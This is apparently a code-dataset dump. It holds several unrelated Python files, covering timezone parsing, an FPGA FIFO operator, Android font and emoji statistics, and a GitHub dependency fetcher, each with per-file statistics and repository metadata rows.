self._vtz = {}
self._parse_rfc(fileobj.read())
def keys(self):
return list(self._vtz.keys())
def get(self, tzid=None):
if tzid is None:
keys = list(self._vtz.keys())
if len(keys) == 0:
raise ValueError("no timezones defined")
elif len(keys) > 1:
raise ValueError("more than one timezone available")
tzid = keys[0]
return self._vtz.get(tzid)
def _parse_offset(self, s):
s = s.strip()
if not s:
raise ValueError("empty offset")
if s[0] in ('+', '-'):
signal = (-1, +1)[s[0]=='+']
s = s[1:]
else:
signal = +1
if len(s) == 4:
return (int(s[:2])*3600+int(s[2:])*60)*signal
elif len(s) == 6:
return (int(s[:2])*3600+int(s[2:4])*60+int(s[4:]))*signal
else:
raise ValueError("invalid offset: "+s)
def _parse_rfc(self, s):
lines = s.splitlines()
if not lines:
raise ValueError("empty string")
# Unfold
i = 0
while i < len(lines):
line = lines[i].rstrip()
if not line:
del lines[i]
elif i > 0 and line[0] == " ":
lines[i-1] += line[1:]
del lines[i]
else:
i += 1
tzid = None
comps = []
invtz = False
comptype = None
for line in lines:
if not line:
continue
name, value = line.split(':', 1)
parms = name.split(';')
if not parms:
raise ValueError("empty property name")
name = parms[0].upper()
parms = parms[1:]
if invtz:
if name == "BEGIN":
if value in ("STANDARD", "DAYLIGHT"):
# Process component
pass
else:
raise ValueError("unknown component: "+value)
comptype = value
founddtstart = False
tzoffsetfrom = None
tzoffsetto = None
rrulelines = []
tzname = None
elif name == "END":
if value == "VTIMEZONE":
if comptype:
raise ValueError("component not closed: "+comptype)
if not tzid:
raise ValueError("mandatory TZID not found")
if not comps:
raise ValueError("at least one component is needed")
# Process vtimezone
self._vtz[tzid] = _tzicalvtz(tzid, comps)
invtz = False
elif value == comptype:
if not founddtstart:
raise ValueError("mandatory DTSTART not found")
if tzoffsetfrom is None:
raise ValueError("mandatory TZOFFSETFROM not found")
if tzoffsetto is None:
raise ValueError("mandatory TZOFFSETFROM not found")
# Process component
rr = None
if rrulelines:
rr = rrule.rrulestr("\n".join(rrulelines),
compatible=True,
ignoretz=True,
cache=True)
comp = _tzicalvtzcomp(tzoffsetfrom, tzoffsetto,
(comptype == "DAYLIGHT"),
tzname, rr)
comps.append(comp)
comptype = None
else:
raise ValueError("invalid component end: "+value)
elif comptype:
if name == "DTSTART":
rrulelines.append(line)
founddtstart = True
elif name in ("RRULE", "RDATE", "EXRULE", "EXDATE"):
rrulelines.append(line)
elif name == "TZOFFSETFROM":
if parms:
raise ValueError("unsupported %s parm: %s "%(name, parms[0]))
tzoffsetfrom = self._parse_offset(value)
elif name == "TZOFFSETTO":
if parms:
raise ValueError("unsupported TZOFFSETTO parm: "+parms[0])
tzoffsetto = self._parse_offset(value)
elif name == "TZNAME":
if parms:
raise ValueError("unsupported TZNAME parm: "+parms[0])
tzname = value
elif name == "COMMENT":
pass
else:
raise ValueError("unsupported property: "+name)
else:
if name == "TZID":
if parms:
raise ValueError("unsupported TZID parm: "+parms[0])
tzid = value
elif name in ("TZURL", "LAST-MODIFIED", "COMMENT"):
pass
else:
raise ValueError("unsupported property: "+name)
elif name == "BEGIN" and value == "VTIMEZONE":
tzid = None
comps = []
invtz = True
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._s))
if sys.platform != "win32":
TZFILES = ["/etc/localtime", "localtime"]
TZPATHS = ["/usr/share/zoneinfo", "/usr/lib/zoneinfo", "/etc/zoneinfo"]
else:
TZFILES = []
TZPATHS = []
def gettz(name=None):
tz = None
if not name:
try:
name = os.environ["TZ"]
except KeyError:
pass
if name is None or name == ":":
for filepath in TZFILES:
if not os.path.isabs(filepath):
filename = filepath
for path in TZPATHS:
filepath = os.path.join(path, filename)
if os.path.isfile(filepath):
break
else:
continue
if os.path.isfile(filepath):
try:
tz = tzfile(filepath)
break
except (IOError, OSError, ValueError):
pass
else:
tz = tzlocal()
else:
if name.startswith(":"):
name = name[:-1]
if os.path.isabs(name):
if os.path.isfile(name):
tz = tzfile(name)
else:
tz = None
else:
for path in TZPATHS:
filepath = os.path.join(path, name)
if not os.path.isfile(filepath):
filepath = filepath.replace(' ', '_')
if not os.path.isfile(filepath):
continue
try:
tz = tzfile(filepath)
break
except (IOError, OSError, ValueError):
pass
else:
tz = None
if tzwin:
try:
tz = tzwin(name)
except OSError:
pass
if not tz:
from dateutil.zoneinfo import gettz
tz = gettz(name)
if not tz:
for c in name:
# name must have at least one offset to be a tzstr
if c in "0123456789":
try:
tz = tzstr(name)
except ValueError:
pass
break
else:
if name in ("GMT", "UTC"):
tz = tzutc()
elif name in time.tzname:
tz = tzlocal()
return tz
# vim:ts=4:sw=4:et
| 34.284079
| 89
| 0.521049
| 3,668
| 32,947
| 4.502726
| 0.147492
| 0.011504
| 0.009445
| 0.008234
| 0.291172
| 0.214822
| 0.182792
| 0.16596
| 0.126786
| 0.11177
| 0
| 0.012239
| 0.38996
| 32,947
| 960
| 90
| 34.319792
| 0.809493
| 0.175008
| 0
| 0.358187
| 0
| 0
| 0.040644
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090643
| false
| 0.013158
| 0.017544
| 0.038012
| 0.245614
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
133a869b28cf9968a719e243a3266dfb25b637ba
| 18,998
|
py
|
Python
|
src/finn/custom_op/fpgadataflow/streamingfifo.py
|
AlexMontgomerie/finn
|
ec5f67b333ad4db4acf6191c3b5ab5e9067347aa
|
[
"BSD-3-Clause"
] | 283
|
2019-09-26T10:09:34.000Z
|
2022-03-09T16:36:23.000Z
|
src/finn/custom_op/fpgadataflow/streamingfifo.py
|
AlexMontgomerie/finn
|
ec5f67b333ad4db4acf6191c3b5ab5e9067347aa
|
[
"BSD-3-Clause"
] | 238
|
2019-10-04T12:20:26.000Z
|
2022-03-31T04:50:53.000Z
|
src/finn/custom_op/fpgadataflow/streamingfifo.py
|
AlexMontgomerie/finn
|
ec5f67b333ad4db4acf6191c3b5ab5e9067347aa
|
[
"BSD-3-Clause"
] | 144
|
2019-09-23T13:46:14.000Z
|
2022-03-18T12:55:07.000Z
|
# Copyright (c) 2020, Xilinx
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of FINN nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import numpy as np
from shutil import copy
import subprocess
import math
import warnings
from finn.custom_op.fpgadataflow.hlscustomop import HLSCustomOp
from finn.core.datatype import DataType
from onnx import TensorProto, helper
from finn.util.data_packing import npy_to_rtlsim_input, rtlsim_output_to_npy
from . import templates
class StreamingFIFO(HLSCustomOp):
def __init__(self, onnx_node):
super().__init__(onnx_node)
self.strm_fifo_wrapper = templates.strm_fifo_wrapper
def get_nodeattr_types(self):
my_attrs = {
# FIFO depth
"depth": ("i", True, 0),
# folded shape of input/output
"folded_shape": ("ints", True, []),
# FINN DataTypes for inputs/outputs
"dataType": ("s", True, ""),
# Toggle between hls or IPI implementation
# rtl - use the hls generated IP during stitching
# vivado - use the AXI Infrastructure FIFO
"impl_style": ("s", False, "rtl", {"rtl", "vivado"}),
# FPGA resource type for FIFOs when impl_style is vivado
# auto -- let Vivado decide
# block -- use BRAM
# distributed -- use LUTRAM
# ultra -- use URAM (on UltraScale+)
"ram_style": (
"s",
False,
"auto",
{"auto", "block", "distributed", "ultra"},
),
}
my_attrs.update(super().get_nodeattr_types())
return my_attrs
def make_shape_compatible_op(self, model):
exp_ishape = self.get_normal_input_shape()
oshape = self.get_normal_output_shape()
ishape = tuple(model.get_tensor_shape(self.onnx_node.input[0]))
assert ishape == tuple(exp_ishape), "Unexpect input shape for StreamingFIFO."
# implement tensor with correct shape
values = np.random.randn(*oshape).astype(np.float32)
return helper.make_node(
"Constant",
inputs=[],
outputs=[self.onnx_node.output[0]],
value=helper.make_tensor(
name="const_tensor",
data_type=TensorProto.FLOAT,
dims=values.shape,
vals=values.flatten().astype(float),
),
)
def infer_node_datatype(self, model):
node = self.onnx_node
idt = model.get_tensor_datatype(node.input[0])
if idt != self.get_input_datatype():
warn_str = "inputDataType changing for %s: %s -> %s " % (
node.name,
str(self.get_input_datatype()),
str(idt),
)
warnings.warn(warn_str)
self.set_nodeattr("dataType", idt.name)
# data type stays the same
model.set_tensor_datatype(node.output[0], idt)
def verify_node(self):
pass
def get_verilog_top_module_name(self):
"Return the Verilog top module name for this node."
node = self.onnx_node
prefixed_top_name = "%s" % (node.name)
return prefixed_top_name
def code_generation_ipgen(self, model, fpgapart, clk):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
os.makedirs(verilog_dir)
# copy Q_srl.v from finn-rtllib to verilog directory
memstream_dir = "/workspace/finn/finn-rtllib/memstream/hdl/"
Q_file = os.path.join(memstream_dir, "Q_srl.v")
copy(Q_file, verilog_dir)
# empty code gen dictionary for new entries
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
self.code_gen_dict["$LAYER_NAME$"] = [
"{}_{}".format(self.onnx_node.name, self.onnx_node.name)
]
# make instream width a multiple of 8 for axi interface
in_width = self.get_instream_width_padded()
count_width = int(self.get_nodeattr("depth") - 1).bit_length()
self.code_gen_dict["$COUNT_RANGE$"] = ["[{}:0]".format(count_width - 1)]
self.code_gen_dict["$IN_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$OUT_RANGE$"] = ["[{}:0]".format(in_width - 1)]
self.code_gen_dict["$WIDTH$"] = [str(in_width)]
self.code_gen_dict["$DEPTH$"] = [str(self.get_nodeattr("depth"))]
template = self.strm_fifo_wrapper
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "{}.v".format(self.onnx_node.name)), "w")
f.write(template)
f.close()
self.code_gen_dict.clear()
def ipgen_singlenode_code(self):
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
verilog_dir = "{}/project_{}/sol1/impl/verilog".format(
code_gen_dir, self.onnx_node.name
)
# prepare the IP packaging tcl template
template = templates.ip_package_tcl
self.code_gen_dict.clear()
self.code_gen_dict["$TOPNAME$"] = ["{}".format(self.onnx_node.name)]
# note: setting the root dir as absolute can cause path problems
# the ipgen script will be invoked from the sources dir so root_dir=. is OK
self.code_gen_dict["$VERILOG_DIR$"] = ["."]
for key in self.code_gen_dict:
# transform list into long string separated by '\n'
code_gen_line = "\n".join(self.code_gen_dict[key])
template = template.replace(key, code_gen_line)
f = open(os.path.join(verilog_dir, "package_ip.tcl"), "w")
f.write(template)
f.close()
# create a shell script and call Vivado to invoke the IP pkg script
make_project_sh = verilog_dir + "/make_ip.sh"
working_dir = os.environ["PWD"]
with open(make_project_sh, "w") as f:
f.write("#!/bin/bash \n")
f.write("cd {}\n".format(verilog_dir))
f.write("vivado -mode batch -source package_ip.tcl\n")
f.write("cd {}\n".format(working_dir))
bash_command = ["bash", make_project_sh]
process_compile = subprocess.Popen(bash_command, stdout=subprocess.PIPE)
process_compile.communicate()
# set ipgen_path and ip_path to point to the new packaged IP
self.set_nodeattr("ipgen_path", verilog_dir)
self.set_nodeattr("ip_path", verilog_dir)
vlnv = "xilinx.com:hls:%s:1.0" % (self.onnx_node.name)
self.set_nodeattr("ip_vlnv", vlnv)
self.code_gen_dict.clear()
def get_normal_input_shape(self):
depth = self.get_nodeattr("depth")
# depth has to be between 2 and 256 with the current
# StreamingFIFO implementation
assert depth >= 2, """Depth is too low"""
if depth > 256 and self.get_nodeattr("impl_style") == "rtl":
warnings.warn(
"Depth is high, set between 2 and 256 for efficient SRL implementation"
)
# derive normal shape from folded shape
# StreamingFIFOs are inserted in between fpgadataflow nodes
# the folded shape could be for example (1, nf, pe)
# with nf (neuron folding): mh // pe
# the normal input shape is in this case (1, mh)
# so to achieve this the two inner dimensions are multiplied
# and together with all previous dimensions
# this gives the normal input shape
folded_shape = self.get_nodeattr("folded_shape")
# extract inner dimension
inner_dim = folded_shape[-1]
# multiply with the next inner dimension
folding_factor = folded_shape[-2] * inner_dim
normal_ishape = []
# create the normal_ishape
for i in range(len(folded_shape) - 2):
normal_ishape.append(folded_shape[i])
normal_ishape.append(folding_factor)
return normal_ishape
def get_normal_output_shape(self):
return self.get_normal_input_shape()
def get_folded_input_shape(self):
return self.get_nodeattr("folded_shape")
def get_folded_output_shape(self):
return self.get_nodeattr("folded_shape")
def get_instream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def get_outstream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def execute_node(self, context, graph):
mode = self.get_nodeattr("exec_mode")
node = self.onnx_node
inp = context[node.input[0]]
exp_shape = self.get_normal_input_shape()
if mode == "cppsim":
output = inp
output = np.asarray([output], dtype=np.float32).reshape(*exp_shape)
context[node.output[0]] = output
elif mode == "rtlsim":
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
# create a npy file for the input of the node
assert (
str(inp.dtype) == "float32"
), """Input datatype is
not float32 as expected."""
expected_inp_shape = self.get_folded_input_shape()
reshaped_input = inp.reshape(expected_inp_shape)
if DataType[self.get_nodeattr("dataType")] == DataType.BIPOLAR:
# store bipolar activations as binary
reshaped_input = (reshaped_input + 1) / 2
export_idt = DataType.BINARY
else:
export_idt = DataType[self.get_nodeattr("dataType")]
# make copy before saving the array
reshaped_input = reshaped_input.copy()
np.save(os.path.join(code_gen_dir, "input_0.npy"), reshaped_input)
sim = self.get_rtlsim()
nbits = self.get_instream_width()
inp = npy_to_rtlsim_input(
"{}/input_0.npy".format(code_gen_dir), export_idt, nbits
)
super().reset_rtlsim(sim)
super().toggle_clk(sim)
output = self.rtlsim(sim, inp)
odt = DataType[self.get_nodeattr("dataType")]
target_bits = odt.bitwidth()
packed_bits = self.get_outstream_width()
out_npy_path = "{}/output.npy".format(code_gen_dir)
out_shape = self.get_folded_output_shape()
rtlsim_output_to_npy(
output, out_npy_path, odt, out_shape, packed_bits, target_bits
)
# load and reshape output
output = np.load(out_npy_path)
oshape = self.get_normal_output_shape()
output = np.asarray([output], dtype=np.float32).reshape(*oshape)
context[node.output[0]] = output
else:
raise Exception(
"""Invalid value for attribute exec_mode! Is currently set to: {}
has to be set to one of the following value ("cppsim", "rtlsim")""".format(
mode
)
)
def get_number_output_values(self):
folded_oshape = self.get_folded_output_shape()
return np.prod(folded_oshape[:-1])
def global_includes(self):
pass
def defines(self, var):
pass
def read_npy_data(self):
pass
def strm_decl(self):
pass
def docompute(self):
pass
def dataoutstrm(self):
pass
def save_as_npy(self):
pass
def blackboxfunction(self):
pass
def pragmas(self):
pass
def code_generation_ipi(self):
impl_style = self.get_nodeattr("impl_style")
if impl_style == "rtl":
return super().code_generation_ipi()
elif impl_style == "vivado":
cmd = []
node_name = self.onnx_node.name
depth = self.get_nodeattr("depth")
ram_style = self.get_nodeattr("ram_style")
# create a hierarchy for this layer, with the same port names
clk_name = self.get_verilog_top_module_intf_names()["clk"][0]
rst_name = self.get_verilog_top_module_intf_names()["rst"][0]
dout_name = self.get_verilog_top_module_intf_names()["m_axis"][0][0]
din_name = self.get_verilog_top_module_intf_names()["s_axis"][0][0]
cmd.append("create_bd_cell -type hier %s" % node_name)
cmd.append("create_bd_pin -dir I -type clk /%s/%s" % (node_name, clk_name))
cmd.append("create_bd_pin -dir I -type rst /%s/%s" % (node_name, rst_name))
cmd.append(
"create_bd_intf_pin -mode Master "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s"
% (node_name, dout_name)
)
cmd.append(
"create_bd_intf_pin -mode Slave "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s" % (node_name, din_name)
)
# instantiate and configure DWC
cmd.append(
"create_bd_cell -type ip "
"-vlnv xilinx.com:ip:axis_data_fifo:2.0 /%s/fifo" % node_name
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_DEPTH {%d}] "
"[get_bd_cells /%s/fifo]" % (depth, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_MEMORY_TYPE {%s}] "
"[get_bd_cells /%s/fifo]" % (ram_style, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.TDATA_NUM_BYTES {%d}] "
"[get_bd_cells /%s/fifo]"
% (np.ceil(self.get_outstream_width() / 8), node_name)
)
cmd.append(
"connect_bd_intf_net [get_bd_intf_pins %s/fifo/M_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, dout_name)
)
cmd.append(
"connect_bd_intf_net [get_bd_intf_pins %s/fifo/S_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, din_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aresetn]"
% (node_name, rst_name, node_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aclk]" % (node_name, clk_name, node_name)
)
return cmd
else:
raise Exception(
"FIFO implementation style %s not supported, please use rtl or vivado"
% impl_style
)
def bram_estimation(self):
"""Calculates resource estimation for BRAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "block"):
# Non-BRAM based implementation
return 0
if W == 1:
return math.ceil(depth / 16384)
elif W == 2:
return math.ceil(depth / 8192)
elif W <= 4:
return (math.ceil(depth / 4096)) * (math.ceil(W / 4))
elif W <= 9:
return (math.ceil(depth / 2048)) * (math.ceil(W / 9))
elif W <= 18 or depth > 512:
return (math.ceil(depth / 1024)) * (math.ceil(W / 18))
else:
return (math.ceil(depth / 512)) * (math.ceil(W / 36))
def uram_estimation(self):
"""Calculates resource estimation for URAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "ultra"):
# Non-BRAM based implementation
return 0
else:
return (math.ceil(depth / 4096)) * (math.ceil(W / 72))
def bram_efficiency_estimation(self):
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
bram16_est = self.bram_estimation()
if bram16_est == 0:
return 1
wbits = W * depth
bram16_est_capacity = bram16_est * 36 * 512
return wbits / bram16_est_capacity
def lut_estimation(self):
"""Calculates resource estimations for LUTs"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
address_luts = 2 * math.ceil(math.log(depth, 2))
if impl == "rtl" or (impl == "vivado" and ram_type == "distributed"):
ram_luts = (math.ceil(depth / 32)) * (math.ceil(W / 2))
else:
ram_luts = 0
return int(address_luts + ram_luts)
def prepare_rtlsim(self):
assert self.get_nodeattr("impl_style") != "vivado", (
"StreamingFIFO impl_style "
"cannot be vivado for rtlsim. Only impl_style=rtl supported."
)
super().prepare_rtlsim()
| 40.25
| 88
| 0.600326
| 2,408
| 18,998
| 4.509552
| 0.20515
| 0.035454
| 0.044203
| 0.023483
| 0.348098
| 0.298186
| 0.244037
| 0.24063
| 0.207846
| 0.19523
| 0
| 0.010515
| 0.294189
| 18,998
| 471
| 89
| 40.335456
| 0.799314
| 0.180282
| 0
| 0.263006
| 0
| 0
| 0.144556
| 0.018906
| 0
| 0
| 0
| 0
| 0.011561
| 1
| 0.089595
| false
| 0.028902
| 0.031792
| 0.008671
| 0.193642
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
133a8d431ec24410c6b47b396ebee9494e39f0e3
| 3,403
|
py
|
Python
|
android_fonts.py
|
chrissimpkins/android_fonts
|
f904147774836468a8c011b1596f85577220b140
|
[
"Apache-2.0"
] | 1
|
2022-01-13T01:47:45.000Z
|
2022-01-13T01:47:45.000Z
|
android_fonts.py
|
chrissimpkins/android_fonts
|
f904147774836468a8c011b1596f85577220b140
|
[
"Apache-2.0"
] | 2
|
2022-01-13T03:54:39.000Z
|
2022-03-12T01:00:20.000Z
|
android_fonts.py
|
chrissimpkins/android_fonts
|
f904147774836468a8c011b1596f85577220b140
|
[
"Apache-2.0"
] | 1
|
2022-03-25T20:01:56.000Z
|
2022-03-25T20:01:56.000Z
|
import ast
import emoji
import os
import pandas as pd
_SUPPORT_CACHE_CSV = emoji.datafile('emoji_support.csv')
_API_LEVELS = {
1: ("(no codename)", "1.0"),
2: ("(no codename)", "1.1"),
3: ("Cupcake", "1.5 "),
4: ("Donut", "1.6 "),
5: ("Eclair", "2.0"),
6: ("Eclair", "2.0.1"),
7: ("Eclair", "2.1 "),
8: ("Froyo", "2.2.x "),
9: ("Gingerbread", "2.3 - 2.3.2 "),
10: ("Gingerbread", "2.3.3 - 2.3.7"),
11: ("Honeycomb", "3.0"),
12: ("Honeycomb", "3.1 "),
13: ("Honeycomb", "3.2.x"),
14: ("Ice Cream Sandwich", "4.0.1 - 4.0.2 "),
15: ("Ice Cream Sandwich", "4.0.3 - 4.0.4 "),
16: ("Jelly Bean", "4.1.x"),
17: ("Jelly Bean", "4.2.x"),
18: ("Jelly Bean", "4.3.x"),
19: ("KitKat", "4.4 - 4.4.4"),
21: ("Lollipop", "5.0"),
22: ("Lollipop", "5.1"),
23: ("Marshmallow", "6.0"),
24: ("Nougat", "7.0"),
25: ("Nougat", "7.1"),
26: ("Oreo", "8.0.0"),
27: ("Oreo", "8.1.0"),
28: ("Pie", "9"),
29: ("Android 10 (Q)", "10"),
30: ("Android 11 (R)", "11"),
31: ("Android 12 (S)", "12"),
}
def api_levels():
return _API_LEVELS
def is_font_file(file):
_, ext = os.path.splitext(file)
return ext.lower() in {'.ttf', '.otf', '.ttc'}
def metadata():
records = []
for root, dirs, files in os.walk('api_level'):
for file in files:
if is_font_file(file):
full_file = os.path.join(root, file)
api_level = int(os.path.basename(root))
size = os.stat(full_file).st_size
records.append((api_level, full_file, size))
df = pd.DataFrame(records)
df.columns = ['api_level', 'font_file', 'file_size']
return df
def emoji_support():
"""Dataframe of [emoji_level, font_file, codepoints, supported].
Includes every sequence we could find of any type.
Requires prior execution of populate_emoji_support.py"""
if not os.path.isfile(_SUPPORT_CACHE_CSV):
raise IOError('Please run populate_emoji_support.py first')
return (pd.read_csv(_SUPPORT_CACHE_CSV, converters={'cp_seq': ast.literal_eval})
.rename(columns={'cp_seq': 'codepoints'}))
def font_summary():
df = metadata()
sf = (df
.groupby(['api_level'])
.agg({'font_file': 'count', 'file_size': 'sum'}))
sf['file_size'] = sf['file_size'].apply(lambda sz: (sz / pow(2, 20)))
sf.rename(columns = {
'font_file': 'num_files',
'file_size': 'size_MB',
}, inplace=True)
sf['delta_size_MB'] = sf['size_MB'] - sf['size_MB'].shift(1)
sf.reset_index(inplace=True)
return sf
def emoji_detail():
df = emoji_support()
# merge emoji metadata to gain the status column
df = df.merge(emoji.metadata().drop(columns=['emoji_level']),
on='codepoints')
df = df[df['status'] == 'fully-qualified']
df = df.drop(columns='status')
df.supported = df.supported.astype('int32')
df['api_level'] = df.font_file.str.split('/').str[1]
df.api_level = df.api_level.astype('int32')
df['font_file'] = df.font_file.str.split('/').str[2]
return df
def emoji_summary():
df = emoji_detail()
sf = (df.groupby(['font_file', 'api_level', 'emoji_level'])
.agg({'supported': ['sum', 'count']}))
sf.columns = ['supported', 'total']
sf.reset_index(inplace=True)
sf2 = (sf.drop(columns='emoji_level')
.groupby('api_level')
.agg('sum')
.reset_index())
sf2['delta'] = sf2['supported'] - sf2['supported'].shift(1)
sf2.fillna(0, inplace=True)
return sf, sf2
| 27.666667
| 82
| 0.590949
| 517
| 3,403
| 3.746615
| 0.324952
| 0.041301
| 0.023232
| 0.017553
| 0.075374
| 0.021683
| 0
| 0
| 0
| 0
| 0
| 0.055936
| 0.185718
| 3,403
| 122
| 83
| 27.893443
| 0.643089
| 0.063473
| 0
| 0.041667
| 0
| 0
| 0.269437
| 0.007869
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072917
| false
| 0
| 0.041667
| 0.010417
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
133faca593d6fb1ce0fd475b5ad4b709b64db3a7
| 1,970
|
py
|
Python
|
main.py
|
vsundesha/documentation-hub-dependencies
|
3cdb7c28ceefb7c4ece60fd5e9d3e89640bb0d01
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
vsundesha/documentation-hub-dependencies
|
3cdb7c28ceefb7c4ece60fd5e9d3e89640bb0d01
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
vsundesha/documentation-hub-dependencies
|
3cdb7c28ceefb7c4ece60fd5e9d3e89640bb0d01
|
[
"Apache-2.0"
] | null | null | null |
import config as props
import sys
import getopt
from GitHubDataFetcher import GitHubDataFetcher
from DependencyFile import DependencyFile
from ErrorFile import ErrorFile
# Github Token
TOKEN = props.token
OWNER = ""
REPOSITORY = ""
OUTPUTFILE = ""
def showHelp():
print('-r or --repo The name of the github repository')
print('-o or --owner The owner of the github repository')
print('-f or --outputfile (Optional) (Default : <OWNER+REPONAME>dependecies.json) \
The output file')
def main(argv):
global OWNER, REPOSITORY, OUTPUTFILE
try:
# opts are the arguments and remainders are the arrguments that will not be complete if something goes wrong
opts, remainder = getopt.getopt(
argv, "hr:o:f:", ["repo=", "owner=", "outputfile="])
except getopt.GetoptError:
showHelp()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
showHelp()
sys.exit()
elif opt in ("-r", "--repo"):
REPOSITORY = arg
elif opt in ("-o", "--owner"):
OWNER = arg
elif opt in ("-f", "--outputfile"):
OUTPUTFILE = arg
# check if repo and owner are specified
if(OWNER and REPOSITORY):
# create the fetcher
data = GitHubDataFetcher(OWNER, REPOSITORY, TOKEN)
# get the response object
res = data.getInfo()
# response is type ErrorFile or DependencyFile
if(isinstance(res, DependencyFile)):
if(OUTPUTFILE):
output = OUTPUTFILE+"dependecies.json"
else:
output = OWNER+REPOSITORY+"dependecies.json"
elif(isinstance(res, ErrorFile)):
output = "error.json"
# write file
res.toJson(output)
else:
print("--repo and --owner arguments are mandatory")
if __name__ == "__main__":
main(sys.argv[1:])
| 30.78125
| 117
| 0.579695
| 214
| 1,970
| 5.299065
| 0.38785
| 0.05291
| 0.02381
| 0.037037
| 0.045855
| 0
| 0
| 0
| 0
| 0
| 0
| 0.001485
| 0.316244
| 1,970
| 63
| 118
| 31.269841
| 0.840386
| 0.129949
| 0
| 0.083333
| 0
| 0.020833
| 0.152161
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.125
| 0
| 0.166667
| 0.083333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
133fae22a7b7ebcd7d6ca9fc3157fb56fb5b1062
| 6,036
|
py
|
Python
|
inference_realesrgan.py
|
blabra/Real-ESRGAN
|
bd5c69d2ef30f27cc2a510443451a2dc841aec28
|
[
"BSD-3-Clause"
] | null | null | null |
inference_realesrgan.py
|
blabra/Real-ESRGAN
|
bd5c69d2ef30f27cc2a510443451a2dc841aec28
|
[
"BSD-3-Clause"
] | null | null | null |
